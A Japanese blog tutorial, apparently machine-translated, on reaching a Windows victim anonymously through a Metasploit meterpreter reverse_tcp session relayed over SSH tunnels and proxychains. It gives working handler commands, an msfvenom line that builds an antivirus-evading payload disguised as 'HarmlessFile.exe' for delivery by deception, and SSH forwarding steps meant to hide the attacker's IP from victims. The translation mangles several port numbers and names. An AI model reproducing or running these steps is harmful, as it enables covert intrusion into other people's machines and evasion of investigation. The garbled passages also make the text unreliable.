SSHトンネルを使用した中間サーバーを介したmeterpreter / reverse_tcpへの匿名接続

みなさんこんにちは！ この記事は、Metasploit Frameworkに精通し始めたばかりの初心者を対象としていますが、既に何かを理解しています。 自分が経験豊富な専門家であり、その名前に興味がある場合は、すぐにTL; DR; 最後に。 この記事では、中間サーバーとSSHトンネルを使用して逆TCPを使用してmeterpriterシェルへの匿名アクセスを調整する方法について説明します。



免責事項：チュクチは作家ではなく、警備員でもありません。一般的に、あらゆる分野の専門家としての地位はほとんどありません。 しかし、Chukchiはtorを介した逆tcpを望んでいたので、これを読む必要があります。 また、許可された場所でのみそのようなアクションを実行できることを忘れないでください。そうしないと、刑法のいくつかの記事で脅かされます。

エントリー

Windowsマシンに穴を見つけて、それを貫通したいとします。 オプションを検討してください。通常のcmdは、私たちやmeterpreterの場合には興味がありません。それについて説明します。



meterpreterシェルに接続するための2つの基本原則があります：フォワードとリバース。 meterpreterには多くの接続オプションがありますが、この記事ではbind tcp（direct）とreverse tcp（reverse）についてのみ説明します。



bind tcpを使用して被害者のポートを開き、プロキシまたはトーラスを介して接続する場合、どのような落とし穴がありますか？ まず、被害者のファイアウォールは、このあいまいなプログラムがなぜオンラインになろうとしているのかを尋ねます。ここでホストできますか？ ユーザーが私たちのプログラムがポートを開くのに十分な愚かさ（ほとんどの場合）であり、インターネットに直接アクセスし、白いIPを持っている人に自問してみましょう。 これらのほとんどは残っていませんが、今ではルーターはどこにでもあるので、ポートは内部ネットワークでのみ利用可能になります。 混乱してポートをプッシュすると、最後の問題が残ります。接続するにはipを知る必要があり、定期的に変更できます。 ただし、上記のすべての条件が満たされている場合は、どこからでもプロキシのチェーンを介して接続できます。



逆TCP接続はどうですか？ ファイアウォールは誓いません、ルーターも障害ではありません-被害者は私たち自身に接続するので、IPアドレスを監視する必要はありません。 しかし、問題はもっと深刻です-匿名性。 被害者がどこに接続するかを示す必要があります。つまり、同じnetstatで確認できるIPを記述します。 そして、彼らが言うように、きれいなスーツの叔父または正しい知人を持つ復の犠牲者は、ipで計算し、あなたが何をすべきか知っている靴をきれいにすることができます。 もう1つマイナス-私たちのIPは、被害者に再び接続できるようにするために永続的でなければなりません。



どうする？ 匿名性を維持し、どこからでもログインできるようにする方法は？



この状況から次の方法を見つけました：sshアクセスを備えた中間サーバーが必要です。犠牲者はtcpを逆にします。このサーバーから自分自身にポートを転送し、犠牲者に接続します。 あなたが突然何も理解しなくても、心配しないでください。

初期条件

以下の条件下でプロセス全体を説明します。

1. 攻撃側は、IPアドレス192.168.1.50の Kali Linux 2仮想マシンです。
2. 被害者は、 Windows 7を搭載した仮想マシンになります 。 IP- 192.168.1.146
3. 中級、読み取り- プロキシ 、サーバーはIP 192.168.1.10の Fedora

それらがすべて同じネットワーク上にあるという事実を見ないでください-この方法は、プロキシサーバー、被害者、攻撃マシンがすべて異なるネットワーク上にあるが、インターネットにアクセスできる場合、実際の状況ではうまく機能します。



まず、 ハンドラーを実行します。これは、ポート4444で被害者からの接続を待機し、接続時にmeterpreterを送信するプログラムです。 これを行うには、 Kaliコマンドラインでmsfconsoleを実行し、次のコマンドを実行します。



ハンドラーの選択：

use exploit/multi/handler
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

被害者に対して、逆接続でmeterpreterペイロードを実行することを通知します。

 set PAYLOAD windows/meterpreter/reverse_tcp
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

負荷パラメータを指定します-IPアドレスのポート4444でリッスンします（後で127.0.0.1を指定しないでください）。

 set LHOST 192.168.1.50 set LPORT 4444
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

開始し、より良い時間までこのフォームに残します。

 run
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ペイロードでexeを作成する

次に、プログラムを生成します。このプログラムは、プロキシを介して接続されます。 新しいターミナルタブを開き、次を入力します。

 msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 -e x86/shikata_ga_nai -i 13 -b '\x00' > HarmlessFile.exe
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

引数について簡単に話してください。



最初の3つは明らかです-プロセッサアーキテクチャ、プラットフォーム、および出力ファイル形式。 -p引数は、Metasploitに少し精通している人にはすぐにわかります。meterpreterシェルをペイロードとして選択しました。このシェルは、この場合プロキシサーバーに属するLHOSTホストのLPORTポートに接続します。



最後の3つの引数は、ウイルス対策をバイパスするための暗号化方法を説明します（同時に、ウイルス対策をだますことができるかどうかを確認します）。 この場合、多態性XORエンコードのshikata ga naiの 13回の反復を使用し、-bを使用してゼロバイトを「不良」とマークします。つまり、回避する必要があると言います。 このすべてがHarmlessFile.exeファイルに書き込まれます。このファイルは、cな詐欺の助けを借りて被害者に配信する必要があります。 しかし、私は仮想マシンのマスターなので、KaliからWindowsにコピーするだけです。



アバストはあきらめず、誇らしげに脅威を発表したため、テストに干渉しないようにその場で殺されました。 ファイルが配置されました。サーバーを準備しましょう。

サーバーのセットアップ

静的ポート転送を使用します。





作成したexeでは、ポートは22222で、Kaliではポート4444をリッスンしています。したがって、サーバーポート22222に着信するすべてのリクエストがポート4444に送信されるように、Kaliで次のコマンドを記述する必要があります。

 ssh -v -N -R 22222:127.0.0.1:4444 user@192.168.1.10
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

これがうまくいかない理由を理解するために、このチームで何を達成したかを理解します。 画面に何が起こっているかに関する情報があるとき、私はそれが好きなので、-vを追加しましたが、シェルにアクセスする必要はないので、-N（この場合でも、サーバー上の誰にも表示されません）。 マジック引数-R 127.0.0.1:22222:127.0.0.1:4444は、パケットをリダイレクトするためのルールを記述しています：サーバーアドレス127.0.0.1:22222からローカルアドレス127.0.0.1:4444へ。 最初の127.0.0.1が暗示されているため、省略します。



ニュアンスは、デフォルトでは、この方法でサーバー上で転送されるポートはサーバーlocalhostからのみアクセス可能であり、外部から接続しようとしても何も起こらず、エラーも発生しないことです。



状況を修正しましょう-プロキシサーバーでsshデーモンの設定を開きます- / etc / ssh / sshd_config 、 GatewayPorts行を探し、コメントを外してyesに設定します 。 service sshd reload経由で設定をリロードし 、今度は安心してコマンドを実行します。



そして今、興味深い点です。 このような操作をすべて行ったばかりで、被害者をハンドラーに接続し、メーター計算機のコマンドラインを正常に開くことができましたが、コマンド（ヘルプを含む）を入力すると、ワイルドエラーで接続が閉じられました。 今、私が記事を書くとき、すべてが機能します。 とにかくうまくいったとしても、次の段落を読むことをお勧めします。



長時間のグーグル検索の後、Meterpriorの開発者は、LHOST（つまり、リッスンするホストのアドレス）127.0.0.1を指定する価値がないというコメントを見つけました。 127.0.0.2または0.0.0.0のように記述する必要があります。 ただし、最初のオプションを選択した場合は、ポートを127.0.0.2に転送する必要があります。 しかし、このオプションでは、エラーが発生しました。 グーグルでさらに長い時間を過ごした後、別の開発者がコメントを見つけました。127.0.0.1だけでなく、基本的にループバックインターフェイスにもハングアップできません。予約されており、安定して動作しないためです。ネットワークインターフェース、たとえばeth0。 だから私たちは彼に投げかけます。 チームの形式は次のとおりです。

 ssh -v -N -R 22222:192.168.1.50:4444 user@192.168.1.10
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

すでに優れていますが、プロキシチェーンを介して起動することはできません。 これを修正するために、プロキシを介してsshサーバーを自分自身に転送し、それを介してMeterprinterのポートを転送します。



彼らは、標準のKali 2ビルドに含まれるプロキシチェーンはすでに古く、長い間放棄されていると言います。 私にとっては、セグメンテーションエラーで定期的にクラッシュしました。 したがって、私はここから proxychains4（proxychains-ng）を設定し、古いものはそれを地獄に連れて行き、満足しました。



sshを渡します。

 proxychains4 ssh -v -N -L 42022:127.0.0.1:22 user@192.168.1.10
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

127.0.0.1-00-002022でプロキシチェーンを通過するリクエストはすべて192.168.1.10:22になり、プロキシサーバーへの匿名のsshアクセスが取得されます。 メーターのポートをそれを通して投げます。

 ssh -v -N -R 22222:192.168.1.50:4444 user@127.0.0.1 -p 42002
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

192.168.1.10:22ではなく、127.0.0.1-00-002002に正確に接続していることに注意してください。 すべて準備完了です！ 被害者にKraken Run HarmlessFile.exeをリリースし 、結果を楽しんでください。









私のために働いた方法を説明し、必要なタスクを実行した-匿名性とモバイル-2番目の予約をします。 同じことを達成する他の、より簡単な方法があるかもしれませんが、私はそれらを発掘することができませんでした。



私の最初の記事はあなたの法廷にあります-建設的な批判は大歓迎です、PMのタイプミスについてお知らせください。

便利なリンク：

sshユーザーへのメモは、SSH機能、特にSSHトンネルに関する素晴らしい説明です。

Meterpreter基本コマンド -基本的なMeterpreter'aコマンドの説明。



さらに2つの古い記事がありますが、より興味深いMeterpreter機能の説明が含まれています。



Meterpreterペイロードの秘密

Meterpreterの実際：msfによるトリック



リポジトリproxychains-ng